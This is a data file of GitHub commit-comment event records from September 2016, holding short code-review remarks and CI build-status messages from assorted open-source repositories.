{"id":"4502602380","type":"CommitCommentEvent","actor":{"login":"nigelmegitt"},"repo":{"name":"ebu/ebu-tt-live-toolkit"},"payload":{"comment":{"id":18863831,"position":null,"line":null,"path":null,"commit_id":"fe8a4a9dc3305aea1e7376b4430d4eb61da1ed96","created_at":"2016-09-01T13:35:29Z","updated_at":"2016-09-01T13:35:29Z","body":"Thanks, it doesn't help that the stack trace/error messages aren't very helpful in telling you where in the document the validation failure is occurring. My suspicion is that there's a namespace qualification bug on attributes, but it's just a guess. As you say it may be the `xs:any` that's causing the problem."}},"created_at":"2016-09-01T13:35:29Z"}
{"id":"4502602708","type":"CommitCommentEvent","actor":{"login":"pledbrook"},"repo":{"name":"gradle-guides/gs-writing-gs-guides"},"payload":{"comment":{"id":18863832,"position":75,"line":69,"path":"README.adoc","commit_id":"7e0776e8d7337d0d2123c15a4f73916b6f5a6425","created_at":"2016-09-01T13:35:33Z","updated_at":"2016-09-01T13:35:33Z","body":"As the Build Init plugin includes a _settings.gradle_, should we add one to this template? I guess that doesn't work so well when simply cloning a repository as opposed to using a template engine, but the user could manually update the project name."}},"created_at":"2016-09-01T13:35:33Z"}
{"id":"4502603691","type":"CommitCommentEvent","actor":{"login":"rahul1aggarwal"},"repo":{"name":"jiocloudDSS/dsskms"},"payload":{"comment":{"id":18863834,"position":80,"line":80,"path":"src/org/kms/core/MKRequester.java","commit_id":"141a85c7e09315296d9884dc79d7cf08b0c822d6","created_at":"2016-09-01T13:35:43Z","updated_at":"2016-09-01T13:35:43Z","body":"refactor the code of Response and DssConnection to avoid this whole xml thing. instead get a stream and do further processing on it. "}},"created_at":"2016-09-01T13:35:43Z"}
{"id":"4502604052","type":"CommitCommentEvent","actor":{"login":"DavideAllavena"},"repo":{"name":"synapta/public-contracts"},"payload":{"comment":{"id":18863835,"position":14,"line":339,"path":"ext/downloader.js","commit_id":"67f2712fbfe69c6c005fe6f73f85827ebc00f733","created_at":"2016-09-01T13:35:47Z","updated_at":"2016-09-01T13:35:47Z","body":"I see that you removed the possibility of specify a custom download dir. \r\nCan you please re-add it? Do i need a separate branch for this feature?"}},"created_at":"2016-09-01T13:35:47Z"}
{"id":"4502605728","type":"CommitCommentEvent","actor":{"login":"nrel-bot"},"repo":{"name":"NREL/OpenStudio"},"payload":{"comment":{"id":18863840,"position":null,"line":null,"path":null,"commit_id":"d1aa30dd975ff8df31e2bea589b5503ce8141187","created_at":"2016-09-01T13:36:06Z","updated_at":"2016-09-01T13:36:06Z","body":"os_2_0_develop (kbenne) - i386-Windows-7-VisualStudio-12: Tests Failed (0 of 0 tests passed, 0 test warnings)\n\n\n\n<a href='https://nrel.github.io/OpenStudioBuildResults/OpenStudio-d1aa30dd975ff8df31e2bea589b5503ce8141187-i386-Windows-7-VisualStudio-12.html'>![Build Badge](http://img.shields.io/badge/build%20status-passing-green.svg)</a> <a href='https://nrel.github.io/OpenStudioBuildResults/OpenStudio-d1aa30dd975ff8df31e2bea589b5503ce8141187-i386-Windows-7-VisualStudio-12.html'>![Test Badge](http://img.shields.io/badge/tests%20passed-NA-red.svg)</a> \n"}},"created_at":"2016-09-01T13:36:06Z"}
{"id":"4502606222","type":"CommitCommentEvent","actor":{"login":"borshop"},"repo":{"name":"basho/bitcask"},"payload":{"comment":{"id":18863841,"position":null,"line":null,"path":null,"commit_id":"3a32879b1af049586f66fa4c4db94c96bff8409a","created_at":"2016-09-01T13:36:11Z","updated_at":"2016-09-01T13:36:11Z","body":"fast-forwarding develop to borshop-integration-244-nem-bump-cuttlefish-to-develop = fa7fb77c"}},"created_at":"2016-09-01T13:36:11Z"}
{"id":"4502606628","type":"CommitCommentEvent","actor":{"login":"borshop"},"repo":{"name":"basho/clique"},"payload":{"comment":{"id":18863844,"position":null,"line":null,"path":null,"commit_id":"3878f2d88979f2d0bc4d0e081d2d0efbf4240798","created_at":"2016-09-01T13:36:15Z","updated_at":"2016-09-01T13:36:15Z","body":"fast-forwarding develop to borshop-integration-76-nem-bump-cuttlefish-to-develop = f0dbf492"}},"created_at":"2016-09-01T13:36:15Z"}
{"id":"4502609567","type":"CommitCommentEvent","actor":{"login":"rahul1aggarwal"},"repo":{"name":"jiocloudDSS/dsskms"},"payload":{"comment":{"id":18863855,"position":89,"line":89,"path":"src/org/kms/core/MKRequester.java","commit_id":"141a85c7e09315296d9884dc79d7cf08b0c822d6","created_at":"2016-09-01T13:36:46Z","updated_at":"2016-09-01T13:36:46Z","body":"retry should have some sleep between subsequent calls with exponential backoff"}},"created_at":"2016-09-01T13:36:46Z"}
{"id":"4502610826","type":"CommitCommentEvent","actor":{"login":"atsjenkins"},"repo":{"name":"advancedtelematic/rvi_sota_server"},"payload":{"comment":{"id":18863865,"position":null,"line":null,"path":null,"commit_id":"e27cca5f09d1e5e67b645ec00debc6eafed6af25","created_at":"2016-09-01T13:36:59Z","updated_at":"2016-09-01T13:36:59Z","body":"TeamCity OTA+ :: rvi_sota_server :: ci [Build 881](http://teamcity.prod01.internal.advancedtelematic.com:8111/viewLog.html?buildId=12198&buildTypeId=ota_plus_RviSotaServer_Ci) is now running\n"}},"created_at":"2016-09-01T13:36:59Z"}
{"id":"4502611674","type":"CommitCommentEvent","actor":{"login":"atsjenkins"},"repo":{"name":"advancedtelematic/rvi_sota_server"},"payload":{"comment":{"id":18863867,"position":null,"line":null,"path":null,"commit_id":"96d1220a31ae739cda6d64d88bf8bb0fe566c32e","created_at":"2016-09-01T13:37:08Z","updated_at":"2016-09-01T13:37:08Z","body":"TeamCity OTA+ :: rvi_sota_server :: ci [Build 880](http://teamcity.prod01.internal.advancedtelematic.com:8111/viewLog.html?buildId=12194&buildTypeId=ota_plus_RviSotaServer_Ci) outcome was **UNKNOWN**\nSummary: Canceled (Exit code 137 (new)) Build time: 00:03:19"}},"created_at":"2016-09-01T13:37:08Z"}
{"id":"4502611780","type":"CommitCommentEvent","actor":{"login":"atsjenkins"},"repo":{"name":"advancedtelematic/rvi_sota_server"},"payload":{"comment":{"id":18863868,"position":null,"line":null,"path":null,"commit_id":"4fcb6b36ced4f05a489da14748c909a7d417be50","created_at":"2016-09-01T13:37:09Z","updated_at":"2016-09-01T13:37:09Z","body":"TeamCity OTA+ :: rvi_sota_server :: ci [Build 882](http://teamcity.prod01.internal.advancedtelematic.com:8111/viewLog.html?buildId=12199&buildTypeId=ota_plus_RviSotaServer_Ci) is now running\n"}},"created_at":"2016-09-01T13:37:09Z"}
{"id":"4502612332","type":"CommitCommentEvent","actor":{"login":"rahul1aggarwal"},"repo":{"name":"jiocloudDSS/dsskms"},"payload":{"comment":{"id":18863871,"position":138,"line":138,"path":"src/org/kms/core/MKRequester.java","commit_id":"141a85c7e09315296d9884dc79d7cf08b0c822d6","created_at":"2016-09-01T13:37:15Z","updated_at":"2016-09-01T13:37:15Z","body":"sleep"}},"created_at":"2016-09-01T13:37:15Z"}
{"id":"4502615634","type":"CommitCommentEvent","actor":{"login":"KangOl"},"repo":{"name":"odoo/odoo"},"payload":{"comment":{"id":18863876,"position":15,"line":15,"path":"addons/payment_paypal/models/account_invoice.py","commit_id":"2ab68047c11c0902b6a9e5d772b654862fba9c40","created_at":"2016-09-01T13:37:49Z","updated_at":"2016-09-01T13:37:49Z","body":"Fixed by 198c080b3512e8b7fbcd9ab47d15746776d5d1a6 in saas-11 and 74ff1a50fa141d40eff447bde782ce6a2d2611ef in saas-12"}},"created_at":"2016-09-01T13:37:49Z"}
{"id":"4502615670","type":"CommitCommentEvent","actor":{"login":"ddprrt"},"repo":{"name":"Dynatrace/css-groundhog"},"payload":{"comment":{"id":18863878,"position":7,"line":7,"path":"docs/_pages/robots.txt","commit_id":"3f0da58a3a3b8b93e6440faa018b0095344e49d9","created_at":"2016-09-01T13:37:50Z","updated_at":"2016-09-01T13:37:50Z","body":"❤️"}},"created_at":"2016-09-01T13:37:50Z"}
{"id":"4502615754","type":"CommitCommentEvent","actor":{"login":"rahul1aggarwal"},"repo":{"name":"jiocloudDSS/dsskms"},"payload":{"comment":{"id":18863879,"position":107,"line":107,"path":"src/org/kms/core/MKRequester.java","commit_id":"141a85c7e09315296d9884dc79d7cf08b0c822d6","created_at":"2016-09-01T13:37:51Z","updated_at":"2016-09-01T13:37:51Z","body":"proper logging and exceptions. May be create own exception classes and use those"}},"created_at":"2016-09-01T13:37:51Z"}
{"id":"4502616941","type":"CommitCommentEvent","actor":{"login":"borshop"},"repo":{"name":"basho/riak_kv"},"payload":{"comment":{"id":18863882,"position":null,"line":null,"path":null,"commit_id":"7cc2a58dee2d1c43bc4948b8f0b9e1ff27013659","created_at":"2016-09-01T13:38:03Z","updated_at":"2016-09-01T13:38:03Z","body":"fast-forwarding develop-2.2 to borshop-integration-1470-nem-bump-bitcask-to-develop = 536f442c"}},"created_at":"2016-09-01T13:38:03Z"}
{"id":"4502617095","type":"CommitCommentEvent","actor":{"login":"lekma"},"repo":{"name":"lekma/tvheadend"},"payload":{"comment":{"id":18863883,"position":null,"line":null,"path":null,"commit_id":"06207f2eb2d175d17f8949888654b388002b02f3","created_at":"2016-09-01T13:38:05Z","updated_at":"2016-09-01T13:38:05Z","body":"> So vaapi_hevc is hw enhanced even if the gpu don't support this (worth to mention this at the help text).\r\n\r\nno (iirc, the encoder falls back to sw)."}},"created_at":"2016-09-01T13:38:05Z"}
{"id":"4502617317","type":"CommitCommentEvent","actor":{"login":"palaso-bob"},"repo":{"name":"sillsdev/libpalaso"},"payload":{"comment":{"id":18863886,"position":null,"line":null,"path":null,"commit_id":"297a5f569efeb953533e10fa4c415c6d0843cb05","created_at":"2016-09-01T13:38:08Z","updated_at":"2016-09-01T13:38:08Z","body":"TeamCity libpalaso :: palaso-precise64-master Continuous [Build 3.0.758.297a5f569efeb953533e10fa4c415c6d0843cb05](http://build.palaso.org/viewLog.html?buildId=76314&buildTypeId=bt322) outcome was **SUCCESS**\nSummary: Tests passed: 3470, ignored: 107 Build time: 00:07:46"}},"created_at":"2016-09-01T13:38:08Z"}
{"id":"4502620727","type":"CommitCommentEvent","actor":{"login":"palaso-bob"},"repo":{"name":"sillsdev/libpalaso"},"payload":{"comment":{"id":18863893,"position":null,"line":null,"path":null,"commit_id":"297a5f569efeb953533e10fa4c415c6d0843cb05","created_at":"2016-09-01T13:38:44Z","updated_at":"2016-09-01T13:38:44Z","body":"TeamCity libpalaso :: palaso-win32-master Continuous [Build 3.0.758.297a5f569efeb953533e10fa4c415c6d0843cb05](http://build.palaso.org/viewLog.html?buildId=76313&buildTypeId=bt223) outcome was **SUCCESS**\nSummary: Tests passed: 3490, ignored: 126 Build time: 00:08:10"}},"created_at":"2016-09-01T13:38:44Z"}
{"id":"4502621611","type":"CommitCommentEvent","actor":{"login":"nrel-bot"},"repo":{"name":"NREL/OpenStudio"},"payload":{"comment":{"id":18863898,"position":null,"line":null,"path":null,"commit_id":"d1aa30dd975ff8df31e2bea589b5503ce8141187","created_at":"2016-09-01T13:38:54Z","updated_at":"2016-09-01T13:38:54Z","body":"os_2_0_develop (kbenne) - Win64-Windows-7-VisualStudio-12: Tests Failed (0 of 0 tests passed, 0 test warnings)\n\n\n\n<a href='https://nrel.github.io/OpenStudioBuildResults/OpenStudio-d1aa30dd975ff8df31e2bea589b5503ce8141187-Win64-Windows-7-VisualStudio-12.html'>![Build Badge](http://img.shields.io/badge/build%20status-passing-green.svg)</a> <a href='https://nrel.github.io/OpenStudioBuildResults/OpenStudio-d1aa30dd975ff8df31e2bea589b5503ce8141187-Win64-Windows-7-VisualStudio-12.html'>![Test Badge](http://img.shields.io/badge/tests%20passed-NA-red.svg)</a> \n"}},"created_at":"2016-09-01T13:38:54Z"}
{"id":"4502622534","type":"CommitCommentEvent","actor":{"login":"antoinegiard"},"repo":{"name":"FriendsOfSymfony/FOSUserBundle"},"payload":{"comment":{"id":18863905,"position":null,"line":null,"path":null,"commit_id":"b044f44de9c3a059726338dfa7441a7cde84c77d","created_at":"2016-09-01T13:39:04Z","updated_at":"2016-09-01T13:39:04Z","body":"Agreed, this just broke template override without notice."}},"created_at":"2016-09-01T13:39:04Z"}
{"id":"4502622690","type":"CommitCommentEvent","actor":{"login":"terw-dan"},"repo":{"name":"Yoast/wordpress-develop-mirror"},"payload":{"comment":{"id":18863906,"position":46,"line":48,"path":"src/wp-admin/js/media-upload.js","commit_id":"bf991fa6da1d74a1d72b18ff5a516703d5fd537f","created_at":"2016-09-01T13:39:07Z","updated_at":"2016-09-01T13:39:07Z","body":"Please add some documentation for what happens with hasQuicktags. "}},"created_at":"2016-09-01T13:39:07Z"}
{"id":"4502628393","type":"CommitCommentEvent","actor":{"login":"sedwards2009"},"repo":{"name":"Ultimaker/Cura"},"payload":{"comment":{"id":18863918,"position":92,"line":284,"path":"resources/qml/Preferences/ProfilesPage.qml","commit_id":"a2f478f2ad9df16e62f40406cf913957d3fac3f1","created_at":"2016-09-01T13:40:09Z","updated_at":"2016-09-01T13:40:09Z","body":"The RenameDialog defines it as 'object'. Not a great name. I didn't want to touch RenameDialog.qml and make more regression risk.\r\n"}},"created_at":"2016-09-01T13:40:09Z"}
{"id":"4502628897","type":"CommitCommentEvent","actor":{"login":"touseefwasil"},"repo":{"name":"touseefwasil/NewRepo"},"payload":{"comment":{"id":18863921,"position":1,"line":1,"path":"README.md","commit_id":"e7fa03f9e2b930dea9dcb1c98ae507f47d54f6de","created_at":"2016-09-01T13:40:15Z","updated_at":"2016-09-01T13:40:15Z","body":"lklkl"}},"created_at":"2016-09-01T13:40:15Z"}
{"id":"4502630064","type":"CommitCommentEvent","actor":{"login":"nrel-bot-3"},"repo":{"name":"NREL/OpenStudio"},"payload":{"comment":{"id":18863923,"position":null,"line":null,"path":null,"commit_id":"d1aa30dd975ff8df31e2bea589b5503ce8141187","created_at":"2016-09-01T13:40:26Z","updated_at":"2016-09-01T13:40:26Z","body":"os_2_0_develop (kbenne) - x86_64-MacOS-10.10-clang: Build Failed\n\n\n\n<a href='https://nrel.github.io/OpenStudioBuildResults/OpenStudio-d1aa30dd975ff8df31e2bea589b5503ce8141187-x86_64-MacOS-10.10-clang.html'>![Build Badge](http://img.shields.io/badge/build%20status-failing-red.svg)</a> <a href='https://nrel.github.io/OpenStudioBuildResults/OpenStudio-d1aa30dd975ff8df31e2bea589b5503ce8141187-x86_64-MacOS-10.10-clang.html'>![Test Badge](http://img.shields.io/badge/tests%20passed-NA-red.svg)</a> \n"}},"created_at":"2016-09-01T13:40:26Z"}
{"id":"4502630863","type":"CommitCommentEvent","actor":{"login":"rahul1aggarwal"},"repo":{"name":"jiocloudDSS/dsskms"},"payload":{"comment":{"id":18863925,"position":131,"line":131,"path":"src/org/kms/core/EncryptMain.java","commit_id":"141a85c7e09315296d9884dc79d7cf08b0c822d6","created_at":"2016-09-01T13:40:34Z","updated_at":"2016-09-01T13:40:34Z","body":"common code in encrypt/decrypt servelets, can we make a common method ?"}},"created_at":"2016-09-01T13:40:34Z"}
{"id":"4502631324","type":"CommitCommentEvent","actor":{"login":"erSitzt"},"repo":{"name":"Graylog2/graylog-plugin-slack"},"payload":{"comment":{"id":18863926,"position":null,"line":null,"path":null,"commit_id":"ef55ffd207d6c7f26449b092b2867d6de2e49446","created_at":"2016-09-01T13:40:39Z","updated_at":"2016-09-01T13:40:39Z","body":"It would be nice if this change could be added to the 2.1.0 release for those stuck with graylog 1.x and want to use it with mattermost "}},"created_at":"2016-09-01T13:40:39Z"}
{"id":"4502633311","type":"CommitCommentEvent","actor":{"login":"CvH"},"repo":{"name":"lekma/tvheadend"},"payload":{"comment":{"id":18863931,"position":null,"line":null,"path":null,"commit_id":"06207f2eb2d175d17f8949888654b388002b02f3","created_at":"2016-09-01T13:41:00Z","updated_at":"2016-09-01T13:41:00Z","body":"but the decoder would use at least vaapi what is not used if you use h265 without vaapi ?!"}},"created_at":"2016-09-01T13:41:00Z"}
{"id":"4502633517","type":"CommitCommentEvent","actor":{"login":"nrel-bot-2"},"repo":{"name":"NREL/OpenStudio"},"payload":{"comment":{"id":18863932,"position":null,"line":null,"path":null,"commit_id":"d1aa30dd975ff8df31e2bea589b5503ce8141187","created_at":"2016-09-01T13:41:01Z","updated_at":"2016-09-01T13:41:01Z","body":"os_2_0_develop (kbenne) - x86_64-Linux-Ubuntu-14.04-cppcheck-1.61: Build Failed\n\n\n\n<a href='https://nrel.github.io/OpenStudioBuildResults/OpenStudio-d1aa30dd975ff8df31e2bea589b5503ce8141187-x86_64-Linux-Ubuntu-14.04-cppcheck-1.61.html'>![Build Badge](http://img.shields.io/badge/build%20status-failing-red.svg)</a>  \n"}},"created_at":"2016-09-01T13:41:01Z"}
{"id":"4502639300","type":"CommitCommentEvent","actor":{"login":"snicoll"},"repo":{"name":"spring-projects/spring-boot"},"payload":{"comment":{"id":18863947,"position":9,"line":131,"path":"spring-boot-tools/spring-boot-maven-plugin/src/main/java/org/springframework/boot/maven/RunMojo.java","commit_id":"951f051df95933d57776eb6ac23372665cb1965c","created_at":"2016-09-01T13:42:00Z","updated_at":"2016-09-01T13:42:00Z","body":"oops, good catch!"}},"created_at":"2016-09-01T13:42:00Z"}
{"id":"4502639472","type":"CommitCommentEvent","actor":{"login":"rista404"},"repo":{"name":"rista404/next-project-kickstart"},"payload":{"comment":{"id":18863948,"position":null,"line":null,"path":null,"commit_id":"dcbf35f84bb52335abc805aea17ac8f4792e9344","created_at":"2016-09-01T13:42:03Z","updated_at":"2016-09-01T13:42:03Z","body":"https://github.com/rollup/rollup/issues/887"}},"created_at":"2016-09-01T13:42:03Z"}
{"id":"4502641538","type":"CommitCommentEvent","actor":{"login":"terw-dan"},"repo":{"name":"Yoast/wordpress-develop-mirror"},"payload":{"comment":{"id":18863953,"position":48,"line":51,"path":"src/wp-admin/js/media-upload.js","commit_id":"bf991fa6da1d74a1d72b18ff5a516703d5fd537f","created_at":"2016-09-01T13:42:22Z","updated_at":"2016-09-01T13:42:22Z","body":"Please add some documentation for what happens if hasQuicktags and hasTinyMCE are both false."}},"created_at":"2016-09-01T13:42:22Z"}
{"id":"4502642457","type":"CommitCommentEvent","actor":{"login":"dengert"},"repo":{"name":"dengert/OpenSC"},"payload":{"comment":{"id":18863955,"position":null,"line":null,"path":null,"commit_id":"740a41b5a82d490ebc39ef22c128b413abede2ca","created_at":"2016-09-01T13:42:32Z","updated_at":"2016-09-01T13:42:32Z","body":"I will wait till whatever version you want is committed to master. Right now\r\nhttps://github.com/OpenSC/OpenSC/commit/e4f5f845129e3d0311e8e2994ae7e471b337f7f5 is on master."}},"created_at":"2016-09-01T13:42:32Z"}
{"id":"4502642573","type":"CommitCommentEvent","actor":{"login":"Raffiki"},"repo":{"name":"doshisunny/react-bootstrap-table"},"payload":{"comment":{"id":18863957,"position":6,"line":175,"path":"src/BootstrapTable.js","commit_id":"21f490fb22717176e93d58855c2f01fd5581f337","created_at":"2016-09-01T13:42:33Z","updated_at":"2016-09-01T13:42:33Z","body":"you can use  `sizePerPage` here.\r\n\r\n```\r\n     this.setState({\r\n        data: nextProps.data.slice(),\r\n        currPage: page,\r\n        sizePerPage\r\n      });\r\n```"}},"created_at":"2016-09-01T13:42:33Z"}
{"id":"4502644495","type":"CommitCommentEvent","actor":{"login":"mtrabelsi"},"repo":{"name":"exo-addons/chat-application"},"payload":{"comment":{"id":18863958,"position":5,"line":418,"path":"application/src/main/webapp/js/notif.js","commit_id":"687949b1600f18aeff4b41986014570d2890b832","created_at":"2016-09-01T13:42:53Z","updated_at":"2016-09-01T13:42:53Z","body":"Strange indentation after the push.."}},"created_at":"2016-09-01T13:42:53Z"}
{"id":"4502645878","type":"CommitCommentEvent","actor":{"login":"fieldOfView"},"repo":{"name":"Ultimaker/Cura"},"payload":{"comment":{"id":18863959,"position":4,"line":64,"path":"resources/qml/Preferences/ProfilesPage.qml","commit_id":"a2f478f2ad9df16e62f40406cf913957d3fac3f1","created_at":"2016-09-01T13:43:08Z","updated_at":"2016-09-01T13:43:08Z","body":"QML, it is weird."}},"created_at":"2016-09-01T13:43:08Z"}
{"id":"4502647573","type":"CommitCommentEvent","actor":{"login":"fsantanna"},"repo":{"name":"PaivaHugo/EDL"},"payload":{"comment":{"id":18863967,"position":null,"line":null,"path":null,"commit_id":"1defb12f88e363872f87336cd152880d5d835ace","created_at":"2016-09-01T13:43:24Z","updated_at":"2016-09-01T13:43:24Z","body":"Muito bom! Obrigado."}},"created_at":"2016-09-01T13:43:24Z"}
{"id":"4502648058","type":"CommitCommentEvent","actor":{"login":"ajaybhatt003"},"repo":{"name":"mattdreimer/AutonomousGrainCart"},"payload":{"comment":{"id":18863968,"position":null,"line":null,"path":null,"commit_id":"dc24ed375fc68128687eaa9fb6f6f758a4f826e9","created_at":"2016-09-01T13:43:29Z","updated_at":"2016-09-01T13:43:29Z","body":"Hey @mattdreimer,I admire your work....my project requires me to interface arduino with pixhawk but have no idea how to do that....can you please explain me by a simple code how to collect serial data coming out of arduino by pixhawk and send to ground station.....lets say arduino is giving out data like 1,2.5 on serial port and the same data needs to be collected by pixhawk to send to ground station...kindly help when you get time"}},"created_at":"2016-09-01T13:43:29Z"}
{"id":"4502649765","type":"CommitCommentEvent","actor":{"login":"atsjenkins"},"repo":{"name":"advancedtelematic/rvi_sota_server"},"payload":{"comment":{"id":18863971,"position":null,"line":null,"path":null,"commit_id":"b3e9b0ca7682d8c6a16c573cf96cbd09bd6596fc","created_at":"2016-09-01T13:43:47Z","updated_at":"2016-09-01T13:43:47Z","body":"TeamCity OTA+ :: rvi_sota_server :: ci [Build 883](http://teamcity.prod01.internal.advancedtelematic.com:8111/viewLog.html?buildId=12202&buildTypeId=ota_plus_RviSotaServer_Ci) is now running\n"}},"created_at":"2016-09-01T13:43:47Z"}
{"id":"4502652301","type":"CommitCommentEvent","actor":{"login":"atsjenkins"},"repo":{"name":"advancedtelematic/rvi_sota_server"},"payload":{"comment":{"id":18863976,"position":null,"line":null,"path":null,"commit_id":"4fcb6b36ced4f05a489da14748c909a7d417be50","created_at":"2016-09-01T13:44:13Z","updated_at":"2016-09-01T13:44:13Z","body":"TeamCity OTA+ :: rvi_sota_server :: ci [Build 882](http://teamcity.prod01.internal.advancedtelematic.com:8111/viewLog.html?buildId=12199&buildTypeId=ota_plus_RviSotaServer_Ci) outcome was **FAILURE**\nSummary: Tests failed: 1, passed: 189, ignored: 3 Build time: 00:07:03\n### Failed tests\n```\norg.genivi.sota.device_registry.test.DeviceResourceSpec: <no details avaliable>\n\n```\n"}},"created_at":"2016-09-01T13:44:13Z"}
{"id":"4502654220","type":"CommitCommentEvent","actor":{"login":"atsjenkins"},"repo":{"name":"advancedtelematic/rvi_sota_server"},"payload":{"comment":{"id":18863979,"position":null,"line":null,"path":null,"commit_id":"e27cca5f09d1e5e67b645ec00debc6eafed6af25","created_at":"2016-09-01T13:44:33Z","updated_at":"2016-09-01T13:44:33Z","body":"TeamCity OTA+ :: rvi_sota_server :: ci [Build 881](http://teamcity.prod01.internal.advancedtelematic.com:8111/viewLog.html?buildId=12198&buildTypeId=ota_plus_RviSotaServer_Ci) outcome was **FAILURE**\nSummary: Tests failed: 1 (1 new), passed: 189, ignored: 3 Build time: 00:07:34\n### Failed tests\n```\norg.genivi.sota.device_registry.test.DeviceResourceSpec: <no details avaliable>\n\n```\n"}},"created_at":"2016-09-01T13:44:33Z"}
{"id":"4502658954","type":"CommitCommentEvent","actor":{"login":"TaskClusterRobot"},"repo":{"name":"mozilla/balrog"},"payload":{"comment":{"id":18863988,"position":null,"line":null,"path":null,"commit_id":"a09fd8ebd1f9df402966682a634eb3c729a3c72a","created_at":"2016-09-01T13:45:22Z","updated_at":"2016-09-01T13:45:22Z","body":"TaskCluster-GitHub: https://tools.taskcluster.net/task-graph-inspector/#CYN1Uj_WT42pbRCBHLw-vA"}},"created_at":"2016-09-01T13:45:22Z"}
{"id":"4502660624","type":"CommitCommentEvent","actor":{"login":"Trass3r"},"repo":{"name":"halmd-org/cuda-wrapper"},"payload":{"comment":{"id":18863992,"position":78,"line":78,"path":"cuda_wrapper/copy.hpp","commit_id":"161a9dcb71d35a8f7c99b57b69449668a874a2e3","created_at":"2016-09-01T13:45:38Z","updated_at":"2016-09-01T13:45:38Z","body":"putting the enable_if into the template part would give a clean return type\r\n`template <typename InputIterator, typename OutputIterator, typename = std::enable_if_t<....>>`"}},"created_at":"2016-09-01T13:45:38Z"}
{"id":"4502662611","type":"CommitCommentEvent","actor":{"login":"Matt07211"},"repo":{"name":"Matt07211/xcover3ltexx_custom_kernel"},"payload":{"comment":{"id":18863995,"position":null,"line":null,"path":null,"commit_id":"cadf4bb10e5a8a05d8627e4ecc37543a5db00c8c","created_at":"2016-09-01T13:45:59Z","updated_at":"2016-09-01T13:45:59Z","body":"What build waring are you suppressing when using the CFlags? I this has any adverse effects, then it might need to be removed, but will be left their until then ;)"}},"created_at":"2016-09-01T13:45:59Z"}
{"id":"4502662990","type":"CommitCommentEvent","actor":{"login":"bNesisDeveloper"},"repo":{"name":"bNesisDeveloper/bNesisSDK"},"payload":{"comment":{"id":18863996,"position":null,"line":null,"path":null,"commit_id":"fafa1c7a15a5c7f08a52f91cc0e553848fb1f3ba","created_at":"2016-09-01T13:46:03Z","updated_at":"2016-09-01T13:46:03Z","body":"bNesis SDK"}},"created_at":"2016-09-01T13:46:03Z"}
{"id":"4502669483","type":"CommitCommentEvent","actor":{"login":"ajaybhatt003"},"repo":{"name":"mattdreimer/AutonomousGrainCart"},"payload":{"comment":{"id":18864013,"position":null,"line":null,"path":null,"commit_id":"dc24ed375fc68128687eaa9fb6f6f758a4f826e9","created_at":"2016-09-01T13:47:09Z","updated_at":"2016-09-01T13:47:09Z","body":"Yes I forgot to mention that I am using Arduino UNO for my purpose..Thanks"}},"created_at":"2016-09-01T13:47:09Z"}
{"id":"4502669536","type":"CommitCommentEvent","actor":{"login":"VolterPL"},"repo":{"name":"Matt07211/xcover3ltexx_custom_kernel"},"payload":{"comment":{"id":18864014,"position":null,"line":null,"path":null,"commit_id":"e2b33efe919b223acc3200f7cbbdd639da6e7301","created_at":"2016-09-01T13:47:09Z","updated_at":"2016-09-01T13:47:09Z","body":"Now it's not necessarily set to false... It's conditional now."}},"created_at":"2016-09-01T13:47:09Z"}
{"id":"4502670494","type":"CommitCommentEvent","actor":{"login":"darkelement1987"},"repo":{"name":"newsh/pokeGram"},"payload":{"comment":{"id":18864017,"position":null,"line":null,"path":null,"commit_id":"6d7a625ac08a73eb2150bf9ad9be0d6fbb8415b9","created_at":"2016-09-01T13:47:18Z","updated_at":"2016-09-01T13:47:18Z","body":"I can't download the .sql file anymore."}},"created_at":"2016-09-01T13:47:18Z"}
{"id":"4502672195","type":"CommitCommentEvent","actor":{"login":"mcarton"},"repo":{"name":"Manishearth/rust-clippy"},"payload":{"comment":{"id":18864020,"position":5,"line":5,"path":"CHANGELOG.md","commit_id":"8d231b22a10687c336117bab26f2864ed80153d6","created_at":"2016-09-01T13:47:35Z","updated_at":"2016-09-01T13:47:35Z","body":"How is that:\r\n\r\n```md\r\n* The following lints are not new but were only usable through the `clippy`\r\n  lint groups: [`filter_next`], [`for_loop_over_option`],\r\n  [`for_loop_over_result`] and [`match_overlapping_arm`]. You should now be\r\n  able to `#[allow/deny]` them individually and they are available directly\r\n  through [`cargo clippy`].\r\n```\r\n?"}},"created_at":"2016-09-01T13:47:35Z"}
{"id":"4502675011","type":"CommitCommentEvent","actor":{"login":"fsantanna"},"repo":{"name":"LuizAndrade/EDL"},"payload":{"comment":{"id":18864025,"position":null,"line":null,"path":null,"commit_id":"6f052662dfb4f0a93306804587009c451d4d40f4","created_at":"2016-09-01T13:48:06Z","updated_at":"2016-09-01T13:48:06Z","body":"Muito bom. Obrigado."}},"created_at":"2016-09-01T13:48:06Z"}
{"id":"4502675483","type":"CommitCommentEvent","actor":{"login":"lballabio"},"repo":{"name":"lballabio/QuantLib"},"payload":{"comment":{"id":18864027,"position":null,"line":null,"path":null,"commit_id":"b4e0d68af6720807cd8b87769a5b055ce158e3ef","created_at":"2016-09-01T13:48:11Z","updated_at":"2016-09-01T13:48:11Z","body":"Yes, it should be a template, but I can do it when I merge the PR."}},"created_at":"2016-09-01T13:48:11Z"}
{"id":"4502678683","type":"CommitCommentEvent","actor":{"login":"vahankhanikyan"},"repo":{"name":"lamozg6/homework10"},"payload":{"comment":{"id":18864039,"position":5,"line":5,"path":"src/Controller/Controller.java","commit_id":"b95a575ea75ec928e5640b6a3a8574e74546d65f","created_at":"2016-09-01T13:48:46Z","updated_at":"2016-09-01T13:48:46Z","body":"Import static ashxati chogtagortzes. code-@ bard kardacvoxa sarqum"}},"created_at":"2016-09-01T13:48:46Z"}
{"id":"4502686762","type":"CommitCommentEvent","actor":{"login":"fsantanna"},"repo":{"name":"JemilleMartins/EDL"},"payload":{"comment":{"id":18864054,"position":null,"line":null,"path":null,"commit_id":"5d270e9d6ba1297b985004e04039ed3079177af0","created_at":"2016-09-01T13:50:09Z","updated_at":"2016-09-01T13:50:09Z","body":"ok"}},"created_at":"2016-09-01T13:50:09Z"}
{"id":"4502686909","type":"CommitCommentEvent","actor":{"login":"terw-dan"},"repo":{"name":"Yoast/wordpress-develop-mirror"},"payload":{"comment":{"id":18864055,"position":67,"line":68,"path":"src/wp-admin/js/media-upload.js","commit_id":"bf991fa6da1d74a1d72b18ff5a516703d5fd537f","created_at":"2016-09-01T13:50:11Z","updated_at":"2016-09-01T13:50:11Z","body":"Please use `@returns`."}},"created_at":"2016-09-01T13:50:11Z"}
